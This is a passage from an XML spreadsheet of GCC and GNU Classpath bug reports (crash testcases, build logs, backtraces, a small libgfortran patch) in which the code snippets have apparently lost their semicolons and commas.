    <t>GCC-9386</t>
  </si>
  <si>
    <t>[3.3 regression] anon union cause segfaults (with testcase)</t>
  </si>
  <si>
    <t>compiling the below snippet with 'g++ -c -O2 bla.ii' segfaults.
I did a small trace of the SEGV and it happens because lookup_anon_field() return NULL for the requested anon field because somehow it's called (from build_class_member_access_expr()) with both parameter T and TYPE being the same.  I don't know why.  I _guess_ this might
be a duplicate of 8863 but because of missing attachment there I couldn't check.
---------------
struct Bla
{
  void operator()()
}
struct Adjustment {
  void set_lower(float lower) {changed()}
  union {
    Bla changed
  }
}
-----------------
Release:
3.3 20030113 CVS
Environment:
x86_64-linux
How-To-Repeat:
compile the snippet above</t>
  </si>
  <si>
    <t>GCC-49519</t>
  </si>
  <si>
    <t>[4.7 Regression] Revision 175272 miscompiled 447.dealII in SPEC CPU 2006</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 175272:
http://gcc.gnu.org/ml/gcc-cvs/2011-06/msg00763.html
miscompiled 447.dealII in SPEC CPU 2006 with
-m32  -O2 -msse2 -mfpmath=sse -ffast-math
447.dealII: copy 0 non-zero return code (exit code=11 signal=0)
****************************************
Contents of dealII.err
****************************************
/bin/sh: line 1: 11020 Segmentation fault      (core dumped) taskset -c $TASK_CP
U ../run_base_ref_lnx32-gcc.0000/dealII_base.lnx32-gcc 23
****************************************
Starting program: /export/regression/rrs/spec/2006/spec/benchspec/CPU2006/447.dealII/run/run_base_ref_lnx32-gcc.0000/dealII_base.lnx32-gcc 23
Refinement cycle: 0
Program received signal SIGSEGV Segmentation fault.
0x08218006 in SparsityPattern::operator()(unsigned int unsigned int) const ()
Missing separate debuginfos use: debuginfo-install glibc-2.14-3.3.f15.i686 libgcc-4.6.0-9.fc15.i686 libstdc++-4.6.0-9.fc15.i686
(gdb) bt
#0  0x08218006 in SparsityPattern::operator()(unsigned int unsigned int) const
    ()
#1  0x0821c931 in LaplaceSolver::Solver::assemble_matrix(LaplaceSolver::Solver::LinearSystem&amp; TriaActiveIterator &gt; const&amp; TriaActiveIterator &gt; const&amp; Threads::DummyThreadMutex&amp;) const ()
#2  0x0821fe7e in LaplaceSolver::Solver::assemble_linear_system(LaplaceSolver::Solver::LinearSystem&amp;) ()
#3  0x08222a32 in LaplaceSolver::Solver::solve_problem() ()
#4  0x0821fa3d in LaplaceSolver::WeightedResidual::solve_problem() ()
#5  0x0821b92e in Framework::run(Framework::ProblemDescription const&amp;) ()
#6  0x0804bf6d in main ()
(gdb)</t>
  </si>
  <si>
    <t>GCC-4223</t>
  </si>
  <si>
    <t>size_t structure doesn't compile in Linux</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
2.96
Environment:
Linux 2.2.16-22
Red Hat 7.0 intel linux
gcc version 2.96 20000731
How-To-Repeat:
cc  -O3   -DPRECOMP  -I. -I/oracle/product/8.1.7/precomp/public -I/oracle/product/8.1.7/rdbms/public -I/oracle/product/8.1.7/rdbms/demo -I/oracle/product/8.1.7/plsql/public -I/oracle/product/8.1.7/network/public -I/usr/include/linux -DLINUX -D_GNU_SOURCE -DSLTS_ENABLE -DSLMXMX_ENABLE -D_REENTRANT -DNS_THREADS    -c sample1.c</t>
  </si>
  <si>
    <t>mpniel</t>
  </si>
  <si>
    <t>GCC-10171</t>
  </si>
  <si>
    <t>[3.2/3.3/3.4 regression] wrong code for inlined function</t>
  </si>
  <si>
    <t>Compile the code using gcc -O2 and the program doesn't give any output. It works with gcc -O1 and works with gcc 2.95.
Release:
2.96 - 3.2
Environment:
x86 Linux
How-To-Repeat:
compile using gcc -O2 and run it</t>
  </si>
  <si>
    <t>mchen</t>
  </si>
  <si>
    <t>GCC-30567</t>
  </si>
  <si>
    <t>[4.2 Regression] -O3 optimizer bug</t>
  </si>
  <si>
    <t>Platform:
  Fedora Core release 4 (Stentz)
  Linux sharptail.lbl.gov 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
% g++ -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /net/rosie/scratch2/rwgk/gcc-4_2-branch/configure --prefix=/net/cci-filer1/vol1/tmp/rwgk/gcc_4_2-branch_2007_01_22_0959_fc4_i686 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.2.0 20070122 (prerelease)
I'll upload a standalone reproducer. Sorry it is not minimal but it is already heavily reduced from the original code and has only standard header dependencies.
To reproduce the problem:
g++ -fPIC -O0 ~/dbg.cpp  ./a.out
1
g++ -fPIC -O3 ~/dbg.cpp  ./a.out
0
g++ -fPIC -O3 ~/dbg.cpp -DSCITBX_MAT3_TRACE_SIMPLE  ./a.out
1
g++ -O3 ~/dbg.cpp  ./a.out
1
The output should be 1 in all cases.
The error occurs in the rot_mx::type() function near the end of the reproducer. Inserting std::cout statements in this function makes the error go away. Therefore I don't know what exactly is going wrong.
By chance I noticed that the SCITBX_MAT3_TRACE_SIMPLE change (see code) also works around the problem. However the trace() function always works if called directly.
I noticed the error the first time on Dec 29 2006 under 32-bit Fedora 6. Therefore I believe it is not Fedora 4 or 6 specific but a general 32-bit optimizer problem.
The gcc svn versions from Dec 29 and Jan 22 both work flawlessly on a 64-bit platfrom (Fedora 5).
I hope you can take it from here. Let me know if you need any other information.</t>
  </si>
  <si>
    <t>GCC-12778</t>
  </si>
  <si>
    <t>[3.4 Regression] 1022 bootstrap failure building libstdc++-v3/src/basic_file.cc</t>
  </si>
  <si>
    <t>/home/rdb/gcc-3.4-20031022.obj/gcc/xgcc -shared-libgcc -B/home/rdb/gcc-3.4-20031
022.obj/gcc/ -nostdinc++ -L/home/rdb/gcc-3.4-20031022.obj/hppa2.0n-hp-hpux11.00/
libstdc++-v3/src -L/home/rdb/gcc-3.4-20031022.obj/hppa2.0n-hp-hpux11.00/libstdc+
+-v3/src/.libs -B/usr/local/hppa2.0n-hp-hpux11.00/bin/ -B/usr/local/hppa2.0n-hp-
hpux11.00/lib/ -isystem /usr/local/hppa2.0n-hp-hpux11.00/include -isystem /usr/l
ocal/hppa2.0n-hp-hpux11.00/sys-include -I/home/rdb/gcc-3.4-20031022.obj/hppa2.0n
-hp-hpux11.00/libstdc++-v3/include/hppa2.0n-hp-hpux11.00 -I/home/rdb/gcc-3.4-200
31022.obj/hppa2.0n-hp-hpux11.00/libstdc++-v3/include -I/home/rdb/gcc-3.4-2003102
2/libstdc++-v3/libsupc++ -O2 -g -O2 -g -O2 -fno-implicit-templates -Wall -W -Wwr
ite-strings -Wcast-qual -fdiagnostics-show-location=once -c basic_file.cc  -fPIC
 -DPIC -o .libs/basic_file.o
basic_file.cc: In member function `std::__basic_file* std::__basic_file&lt;ch
ar&gt;::open(const char* std::_Ios_Openmode int)':
basic_file.cc:179: error: `fopen64' undeclared (first use this function)
basic_file.cc:179: error: (Each undeclared identifier is reported only once for 
each function it appears in.)
basic_file.cc: In member function `std::streamoff std::__basic_file::seeko
ff(std::streamoff std::_Ios_Seekdir)':
basic_file.cc:273: error: `lseek64' undeclared (first use this function)
make[4]: *** [basic_file.lo] Error 1
make[4]: Leaving directory `/home/rdb/gcc-3.4-20031022.obj/hppa2.0n-hp-hpux11.00
/libstdc++-v3/src'
libstdc++-v3 defines _GLIBCXX_USE_LFS but doesn't set -D_FILE_OFFSET_BITS=64
$(getconf XBS5_ILP32_OFFBIG_CFLAGS) so fopen64 and lseek64 aren't defined.</t>
  </si>
  <si>
    <t>rdbrown</t>
  </si>
  <si>
    <t>GCC-16346</t>
  </si>
  <si>
    <t>[4.0 Regression] inline assembly causes an ICE in DOM</t>
  </si>
  <si>
    <t>I compiled a 3.5 powerpc64 toolchain from cvs (20040703) and found it ICED when
compiling a linux kernel. It turns out we had some weird inline assembly. A
cut down testcase is:
int main()
{
        long *foo
        asm volatile(nop: =m(*foo): m(foo))
}
# /usr/local/ppc64-3.5/bin/powerpc64-linux-gcc -O2 -c testcase.c
testcase.c: In function `main':
testcase.c:2: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Changing it to m(*foo) (which is what we want) fixes the ICE.</t>
  </si>
  <si>
    <t>GCC-2246</t>
  </si>
  <si>
    <t>Code generated for IA64 doesn't reset NaT bit on scratch reg</t>
  </si>
  <si>
    <t>The compiler is using a scratch register after a call in
two successive mix instructions.  This modifies/sets all the
bits of that register but does not reset the NaT bit because
the register is also used as the input to those two mix
instructions.
Release:
2.97 20010207 (experimental)
Environment:
IA64 Linux
How-To-Repeat:
Compile the code with no optimizations on an IA64 system
and examine the resulting assembly code.  After the call to
bar you should see mix4.l r15 = r15 r16 since r15 is
a scratch register it might have the NaT bit set and this
instruction propogates that NaT bit setting.</t>
  </si>
  <si>
    <t>GCC-18367</t>
  </si>
  <si>
    <t>[4.1 Regression] make check fails with fixinclude problem</t>
  </si>
  <si>
    <t>Recent CVS. Bootstrap seems OK but make check fails.
alpha1:gcc-obj&gt;uname -a
Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown
alpha1:gcc-obj&gt;g++ -v
Reading specs from /usr/local/lib/gcc/alphaev56-unknown-linux-gnu/4.0.0/specs
Configured with: ../gcc/configure --verbose --enable-languages=c++f95
--disable-nls
Thread model: posix
gcc version 4.0.0 20041106 (experimental)
...
Fixed:  X11/Xmu.h
Fixed:  Xm/BaseClassI.h
Fixed:  Xm/Traversal.h
Newly fixed header:  AvailabilityMacros.h
Newly fixed header:  com_err.h
There were fixinclude test FAILURES
gmake[1]: *** [check] Error 1
gmake[1]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/fixincludes'
gmake: *** [check-fixincludes] Error 2
It isn't obvious what failed. I don't see a log file under the fixincludes
directory.</t>
  </si>
  <si>
    <t>GCC-17330</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: verify_ssa failed during c++ code build in libjava</t>
  </si>
  <si>
    <t>I believe this regression was introduced in the last 30 hours or so.
/home/green/build/gcj/gcc/xgcc -shared-libgcc -B/home/green/build/gcj/gcc/
-nostdinc++ -L/home/green/build/gcj/i686-pc-linux-gnu/libstdc++-v3/src
-L/home/green/build/gcj/i686-pc-linux-gnu/libstdc++-v3/src/.libs
-B/home/green/install/jhbuild-inst/i686-pc-linux-gnu/bin/
-B/home/green/install/jhbuild-inst/i686-pc-linux-gnu/lib/ -isystem
/home/green/install/jhbuild-inst/i686-pc-linux-gnu/include -isystem
/home/green/install/jhbuild-inst/i686-pc-linux-gnu/sys-include -DHAVE_CONFIG_H
-I. -I/home/green/sources/jhbuild-src/gcc/libjava -I./include -I./gcj
-I/home/green/sources/jhbuild-src/gcc/libjava -Iinclude
-I/home/green/sources/jhbuild-src/gcc/libjava/include
-I/home/green/sources/jhbuild-src/gcc/libjava/../boehm-gc/include
-I../boehm-gc/include -I/home/green/sources/jhbuild-src/gcc/libjava/libltdl
-I/home/green/sources/jhbuild-src/gcc/libjava/libltdl
-I/home/green/sources/jhbuild-src/gcc/libjava/.././libjava/../gcc
-I/home/green/sources/jhbuild-src/gcc/libjava/../zlib
-I/home/green/sources/jhbuild-src/gcc/libjava/../libffi/include
-I../libffi/include -O2 -g -O2 -fno-rtti -fnon-call-exceptions
-fdollars-in-identifiers -Wswitch-enum -D_FILE_OFFSET_BITS=64 -ffloat-store
-fno-omit-frame-pointer -I/usr/X11R6/include -Wextra -Wall -D_GNU_SOURCE
-DPREFIX=\/home/green/install/jhbuild-inst\
-DLIBDIR=\/home/green/install/jhbuild-inst/lib\
-DBOOT_CLASS_PATH=\/home/green/install/jhbuild-inst/share/java/libgcj-3.5.0.jar\
-DJAVA_EXT_DIRS=\/home/green/install/jhbuild-inst/share/java/ext\ -g -O2
-D_GNU_SOURCE -MT java/io/natFile.lo -MD -MP -MF java/io/.deps/natFile.Tpo -c
java/io/natFile.cc  -fPIC -DPIC -o java/io/.libs/natFile.o
java/io/natFile.cc: In member function `virtual java::lang::String*
java::io::File::getCanonicalPath()':
java/io/natFile.cc:106: error: Definition in block 34 does not dominate use in
block 9
for SSA_NAME: T.1720_164
in statement:
T.1732_179 = buf_27 + T.1720_164
java/io/natFile.cc:106: internal compiler error: verify_ssa failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-59200</t>
  </si>
  <si>
    <t>ICE with invalid alias template use</t>
  </si>
  <si>
    <t>struct A
{
  static constexpr bool value = true
}
template
struct B
{
  template
    using C = A
}
template
template
  const bool B::C::value
$ g++ -std=gnu++11 -c t.cc
t.cc:15:23: internal compiler error: in cp_parser_type_name at cp/parser.c:14692
   const bool B::C::value
                       ^
0x63918c cp_parser_type_name
        /home/jwakely/src/gcc/gcc/cp/parser.c:14692
0x6293ce cp_parser_qualifying_entity
        /home/jwakely/src/gcc/gcc/cp/parser.c:5535
0x6293ce cp_parser_nested_name_specifier_opt
        /home/jwakely/src/gcc/gcc/cp/parser.c:5244
0x629d3f cp_parser_nested_name_specifier
        /home/jwakely/src/gcc/gcc/cp/parser.c:5443
0x629e88 cp_parser_ptr_operator
        /home/jwakely/src/gcc/gcc/cp/parser.c:17469
0x62c484 cp_parser_declarator
        /home/jwakely/src/gcc/gcc/cp/parser.c:16818
0x64053d cp_parser_init_declarator
        /home/jwakely/src/gcc/gcc/cp/parser.c:16417
0x64141e cp_parser_single_declaration
        /home/jwakely/src/gcc/gcc/cp/parser.c:22914
0x6416c4 cp_parser_template_declaration_after_export
        /home/jwakely/src/gcc/gcc/cp/parser.c:22716
0x6419d5 cp_parser_template_declaration_after_export
        /home/jwakely/src/gcc/gcc/cp/parser.c:22702
0x6204a1 cp_parser_declaration
        /home/jwakely/src/gcc/gcc/cp/parser.c:10852
0x64d959 cp_parser_declaration_seq_opt
        /home/jwakely/src/gcc/gcc/cp/parser.c:10782
0x64de09 cp_parser_translation_unit
        /home/jwakely/src/gcc/gcc/cp/parser.c:4010
0x64de09 c_parse_file()
        /home/jwakely/src/gcc/gcc/cp/parser.c:31187
0x77d4d4 c_common_parse_file()
        /home/jwakely/src/gcc/gcc/c-family/c-opts.c:1055
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-53088</t>
  </si>
  <si>
    <t>[4.8 Regression] gcc.target/i386/pr39082-1.c</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 186687:
http://gcc.gnu.org/ml/gcc-cvs/2012-04/msg00639.html
gave
FAIL: gcc.target/i386/pr39082-1.c  (test for warnings line 33)
./xgcc -B./ -S ../../src-trunk/gcc/testsuite/gcc.target/i386/pr39082-1.c -O2
../../src-trunk/gcc/testsuite/gcc.target/i386/pr39082-1.c: In function â€˜foo1â€™:
../../src-trunk/gcc/testsuite/gcc.target/i386/pr39082-1.c:16:1: note: the ABI of passing union with long double has changed in GCC 4.4
 foo1 (union un u)
 ^
Revision 186685 gave
gcc -S -O2 gcc/gcc/testsuite/gcc.target/i386/pr39082-1.c
gcc/gcc/testsuite/gcc.target/i386/pr39082-1.c: In function â€˜foo3â€™:
gcc/gcc/testsuite/gcc.target/i386/pr39082-1.c:33:12: note: the ABI of passing union with long double has changed in GCC 4.4
   union un u = bar2 (x) /* { dg-message note: the ABI of passing union with long double has changed in GCC 4.4 } */
            ^</t>
  </si>
  <si>
    <t>GCC-30238</t>
  </si>
  <si>
    <t>associated(null-pointer null-pointer) returns .true.</t>
  </si>
  <si>
    <t>For non-array calls the if is directly created in
trans-intrinsic.c's gfc_conv_associated.
As one can see below gfortran currently only checks whether two pointers are the same it also should check whether they are NULL pointers.
Example:
integer pointer :: a
nullify(a)
if(associated(aa)) call abort()
end
and dump:
  int4 * a
  _gfortran_set_std (70 127 0)
  a = 0B
  if (a == a)
    {
      _gfortran_abort ()
    }</t>
  </si>
  <si>
    <t>GCC-23950</t>
  </si>
  <si>
    <t>[3.4 Regression] Two-phase name lookup crash with using a static const integer from a base class as template parameter</t>
  </si>
  <si>
    <t>Accessing members of base classes depending on template parameters from derived 
classes has to be done by postponing the name lookup onte the second phase of 
the standard c++ two phase name lookup (if I'm right about that). This means 
one has to use dependent types so you have to use scope resolution this-&gt; or 
a using declaration in order to access the member of the base class.
Example (this works):
template
class Base
{
    static const int i = 0
}
template
class Derived : public Base
{
    // For two phase name lookup.
    using Base::i
    int foo() const  { return i }
}
In order not to obfuscate bigger classes I heavily used using declarations as 
shown in the example above (instead of writing return Base::i). However 
using a static const integral out of a base class using a using declaration as 
a template parameter resulted in an internal compiler error:
internal compiler error: in uses_template_parms at cp/pt.c:4948
To reproduce the error compile this piece of code:
template
class X
{
}
template
class Base
{
	static const int i = 0
}
template
class Derived : public Base
{
	// For two phase name lookup.
	using Base::i
	X member
}
If I don't use a using declaration but write
    X::i&gt; member
instead of
    using Base::i
    X member
it works though.
Thanks in advance
I'm using g++ 4.0.0 on Windows using these files
http://www.thisiscool.com/gcc_mingw.htm#gcj40
However I have exactly the same internal compiler error using MinGW's g++ 
3.4.2.</t>
  </si>
  <si>
    <t>lichtwerk.x</t>
  </si>
  <si>
    <t>GCC-24584</t>
  </si>
  <si>
    <t>Segfault when reading empty string in namelist file</t>
  </si>
  <si>
    <t>The following program segfaults when the input file has an empty string specified.
        PROGRAM foo
        IMPLICIT NONE
        CHARACTER(len=10) var
        CHARACTER(len=10) sname
        NAMELIST /input/ var
        sname = 'howdy'
        WRITE(**) sname &lt;&lt;&lt;
        OPEN(unit=1file=input.tmpdelim='apostrophe'status='unknown')
        READ(1NML=input) var
        CLOSE(1)
        WRITE(**) var
        END PROGRAM foo
The input file is:
$ cat input.tmp
&amp;INPUT
   var=''
/
The following patch fixes this problem:
Index: io/list_read.c
===================================================================
--- io/list_read.c      (revision 105987)
+++ io/list_read.c      (working copy)
@@ -7998 +79911 @@
              push_char (quote)
              break
            }
-
          unget_char (c)
+
+         /* Must be an empty string. */
+
+         push_char('\0')
          goto done
        CASE_SEPARATORS:</t>
  </si>
  <si>
    <t>CLASSPATH-30732</t>
  </si>
  <si>
    <t>Regular Expression Error</t>
  </si>
  <si>
    <t>The following regular expression:
^[\\\\/]a[\\\\/]$
fails to match either of the following strings:
/a/
\\a\\
Curiously the following is a work-around:
^(\\\\|/)a[\\\\/]$
and so is:
^(\\\\|/)a(\\\\|/)$
but the following is not:
^[\\\\/]a(\\\\|/)$
The problem doesn't occur under vanilla JDK nor .Net.</t>
  </si>
  <si>
    <t>haruki_zaemon</t>
  </si>
  <si>
    <t>GCC-47080</t>
  </si>
  <si>
    <t>[C++0x] explicit conversion function return conversions not restricted to qualifications</t>
  </si>
  <si>
    <t>n3225 only allows a qualification conversion for the return of an explicit conversion function when converting to a non-class type:
struct A {
  explicit operator int()
}
int main() {
  bool b((A())) // should not work
  !A() // should not work!
}
Both are not valid according to 13.3.1.5/1 (second case uses candidate function provided by 13.6/23 for which the bool parameter uses contextual conversion). GCC accepts both.</t>
  </si>
  <si>
    <t>GCC-20303</t>
  </si>
  <si>
    <t>[4.0 only] Can't push more than 16 nested visibility</t>
  </si>
  <si>
    <t>When
#pragma GCC visibility push(default)
#pragma GCC visibility pop
are used for header file wrappers we may have more 16
#pragma GCC visibility push(default)
Currently gcc will fail.</t>
  </si>
  <si>
    <t>GCC-83757</t>
  </si>
  <si>
    <t>[8 regression] gcc.dg/pr82190.c fails starting with r256351</t>
  </si>
  <si>
    <t>Saw this only on powerpc64le and not on be.
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-test2/gcc/xgcc -B/home/seurer/gcc/build/gcc-test2/gcc/ /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.dg/pr82190.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -fno-optimize-strlen -fweb -lm -o ./pr82190.exe
PASS: gcc.dg/pr82190.c (test for excess errors)
Setting LD_LIBRARY_PATH to :/home/seurer/gcc/build/gcc-test2/gcc::/home/seurer/gcc/build/gcc-test2/gcc:/home/seurer/gcc/build/gcc-test2/./gmp/.libs:/home/seurer/gcc/build/gcc-test2/./prev-gmp/.libs:/home/seurer/gcc/build/gcc-test2/./mpfr/src/.libs:/home/seurer/gcc/build/gcc-test2/./prev-mpfr/src/.libs:/home/seurer/gcc/build/gcc-test2/./mpc/src/.libs:/home/seurer/gcc/build/gcc-test2/./prev-mpc/src/.libs:/home/seurer/gcc/build/gcc-test2/./isl/.libs:/home/seurer/gcc/build/gcc-test2/./prev-isl/.libs:/home/seurer/gcc/install/gcc-7.2.0/lib64
spawn [open ...]
FAIL: gcc.dg/pr82190.c execution test
seurer@genoa:~/gcc/build/gcc-test2$ /home/seurer/gcc/build/gcc-test2/gcc/xgcc -B/home/seurer/gcc/build/gcc-test2/gcc/ /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.dg/pr82190.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -g -fno-optimize-strlen -fweb -lm -o ./pr82190.exe
seurer@genoa:~/gcc/build/gcc-test2$ gdb ./pr82190.exe 
(gdb) run
Starting program: /home/seurer/gcc/build/gcc-test2/pr82190.exe 
Program received signal SIGABRT Aborted.
0x00003fffb7ccedb0 in __GI_raise (sig=) at ../sysdeps/unix/sysv/linux/raise.c:54
54	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0  0x00003fffb7ccedb0 in __GI_raise (sig=) at ../sysdeps/unix/sysv/linux/raise.c:54
#1  0x00003fffb7cd1270 in __GI_abort () at abort.c:89
#2  0x000000001000053c in main () at /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.dg/pr82190.c:13</t>
  </si>
  <si>
    <t>GCC-18347</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] mmix-knuth-mmixware testsuite failure: gcc.dg/uninit-C.c</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Sat Nov  6 19:25:03 GMT 2004 I get:
FAIL: gcc.dg/uninit-C.c (test for excess errors)
With the message in the .log being:
/gcc/testsuite/gcc.dg/uninit-C.c: In function '__subvdi3':
/gcc/testsuite/gcc.dg/uninit-C.c:15: internal compiler error: Segmentation fault
I see this worked on a checkout of a 3.3 branch but not with a checkout
of the 3.4 branch.</t>
  </si>
  <si>
    <t>GCC-31743</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with invalid use of new</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
===================
typedef int A[]
A* p = new A
===================
bug.cc:2: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in extract_muldiv_1 at fold-const.c:5661
Please submit a full bug report [etc.]
With GCC 3.4.6 we got:
bug.cc:2: error: cannot convert `int*' to `int (*)[]' in initialization</t>
  </si>
  <si>
    <t>GCC-27889</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE on complex assignment in nested function</t>
  </si>
  <si>
    <t>Trying to compile the espresso electronic structure package from pwscf.org with gfortran 4.1.1 fails with an ICE:
make[1]: Entering directory `/home/donnie/espresso-3.1/Modules'
cpp -P -traditional -D__FFTW -I../include  constraints_module.f90 -o constraints_module.F90
gfortran -O3 -D__FFTW -I../include  -I. -I../Modules -I../PW -I../PH -I../iotk/src -I../CPV -c constraints_module.F90 -o constraints_module.o
constraints_module.F90: In function 'set_structure_factor':
constraints_module.F90:304: internal compiler error: in find_lattice_value at tree-complex.c:133
Interestingly this ICE only occurs at optimization levels greater than -O0.
I've uploaded constraints_module.F90 and the required *.mod files to http://dev.gentoo.org/~spyderous/espresso-ice.tar.bz2 to assist in fixing this.</t>
  </si>
  <si>
    <t>GCC-16670</t>
  </si>
  <si>
    <t>struct { type:0 } passing bugs</t>
  </si>
  <si>
    <t>extern void abort (void)
struct S { int:0 } a b
void foo (struct S x struct S *y)
{
  if (y != &amp;b)
    abort ()
}
int main (void)
{
  foo (a 
  return 0
}
is miscompiled on IA-32.
Argument layout code reserves 0 bytes on the stack for the type
(the same as for struct { } that works correctly) but the &amp;b argument is later
overwritten by 4 bytes at &amp;a:
(insn 23 21 24 1 (set (mem/f/i:SI (reg/f:SI 56 virtual-outgoing-args) [0 S4 A32])
        (symbol_ref:SI (b) )) -1 (nil)
    (nil))
(insn 24 23 25 1 (set (reg:SI 70)
        (mem/s:SI (symbol_ref:SI (a) ) [2 a+0 S0 A8]))
-1 (nil)
    (nil))
(insn 25 24 26 1 (set (mem/s:SI (reg/f:SI 56 virtual-outgoing-args) [0 S0 A8])
        (reg:SI 70)) -1 (nil)
    (nil))
(call_insn 26 25 27 1 (call (mem:QI (symbol_ref:SI (foo) [flags 0x3]
) [0 S1 A8])
        (const_int 4 [0x4])) -1 (nil)
    (expr_list:REG_EH_REGION (const_int 0 [0x0])
        (nil))
    (nil))
The problem is that this structure is given SImode not BLKmode and some routines
play with size_in_bytes while others just look at the mode.
Interesting thing happen with -mregparm=X with such structures as well.
On x86-64 although this testcase works
extern void abort (void)
struct S { int:0 } a b
void foo (int a int b int c int d int e int f struct S x struct S *y)
{
  if (y != &amp;b)
    abort ()
}
int main (void)
{
  foo (0 1 2 3 4 5 a 
  return 0
}
does not.</t>
  </si>
  <si>
    <t>GCC-5381</t>
  </si>
  <si>
    <t>__builtin_ia32_pmulhuw seems unknown to compiler</t>
  </si>
  <si>
    <t>Strangely while using -mmmx __builtin_ia32_pmulhuw is unknown to the compiler while for example __builtin_ia32_pmulhw seems known.  Anyhow as you can see from the generated code the compiler fails to emit an emmx instruction at the end of the routine leading to possible floating point errors after return.
Release:
gcc version 3.1 20020106 (Red Hat Linux Rawhide 3.1-0.17)
Environment:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.1/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib
Thread model: posix</t>
  </si>
  <si>
    <t>david.kastrup</t>
  </si>
  <si>
    <t>GCC-15033</t>
  </si>
  <si>
    <t>[4.0 regression] libgcc2.c:470: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>In stage 1
./xgcc -B./ -B/home/dave/opt/gnu/gcc/gcc-3.5-sjlj/hppa-linux/bin/ -isystem /home
/dave/opt/gnu/gcc/gcc-3.5-sjlj/hppa-linux/include -isystem /home/dave/opt/gnu/gc
c/gcc-3.5-sjlj/hppa-linux/sys-include -L/home/dave/gnu/gcc-3.5/objdir/gcc/../ld
-O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototyp
es -Wold-style-definition  -isystem ./include  -fPIC -DELF=1 -DLINUX=1 -g -DHAVE
_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc -I.
./../gcc/gcc/. -I../../gcc/gcc/../include  -DL_muldi3 -c ../../gcc/gcc/libgcc2.c
 -o libgcc/./_muldi3.o
../../gcc/gcc/libgcc2.c: In function `__muldi3':
../../gcc/gcc/libgcc2.c:470: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-4234</t>
  </si>
  <si>
    <t>aspell exits with ICE building single_repl.cc</t>
  </si>
  <si>
    <t xml:space="preserve">g++ -DHAVE_CONFIG_H -I. -I. -I.. -I../util -I/usr/include -g -O2 -Wp-MD.deps/single_repl.pp -c single_repl.cc  -fPIC -DPIC -o .libs/single_repl.o
repl_util.hh:26: Internal compiler error.
repl_util.hh:26: Please submit a full bug report.
repl_util.hh:26: Internal compiler error:
repl_util.hh:26: See  for instructions.
Release:
2.95.4 20010827 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux resume.rfc822.org 2.4.5 #2 Mon Jul 16 20:36:35 CEST 2001 mips unknown
Architecture: mips
host: mips-mips-linux-gnu
build: mips-mips-linux-gnu
target: mips-mips-linux-gnu
configured with: ../src/configure -v --enable-languages=c++objcCHILLf77 --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --enable-shared --with-fast-fixincludes --with-gnu-as --with-gnu-ld --enable-java-gc=no --with-cpp-install-dir=bin --enable-threads --enable-objc-gc mips-linux
How-To-Repeat:
See attachments for single_repl.ii.bz2
</t>
  </si>
  <si>
    <t>rmurray</t>
  </si>
  <si>
    <t>GCC-45287</t>
  </si>
  <si>
    <t>auto-host #defines intmax_t breaks dfp.c (4.5.1)</t>
  </si>
  <si>
    <t>Building gcc 4.5.1:
gcc -c  -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I/home/jayk/src/gcc-4.5.1/gcc -I/home/jayk/src/gcc-4.5.1/gcc/. -I/home/jayk/src/gcc-4.5.1/gcc/../include -I/home/jayk/src/gcc-4.5.1/gcc/../libcpp/include -I/home/jayk/obj/gcc451/./gmp -I/home/jayk/src/gcc-4.5.1/gmp -I/home/jayk/obj/gcc451/./mpfr -I/home/jayk/src/gcc-4.5.1/mpfr -I/home/jayk/src/gcc-4.5.1/mpc/src  -I/home/jayk/src/gcc-4.5.1/gcc/../libdecnumber -I/home/jayk/src/gcc-4.5.1/gcc/../libdecnumber/dpd -I../libdecnumber     /home/jayk/src/gcc-4.5.1/gcc/dfp.c -o dfp.o
IIn file included from ../libdecnumber/gstdint.h:7:0
                 from /home/jayk/src/gcc-4.5.1/gcc/../libdecnumber/decContext.h:54
                 from /home/jayk/src/gcc-4.5.1/gcc/../libdecnumber/decNumber.h:37
                 from /home/jayk/src/gcc-4.5.1/gcc/../libdecnumber/dpd/decimal128.h:58
                 from /home/jayk/src/gcc-4.5.1/gcc/dfp.c:34:
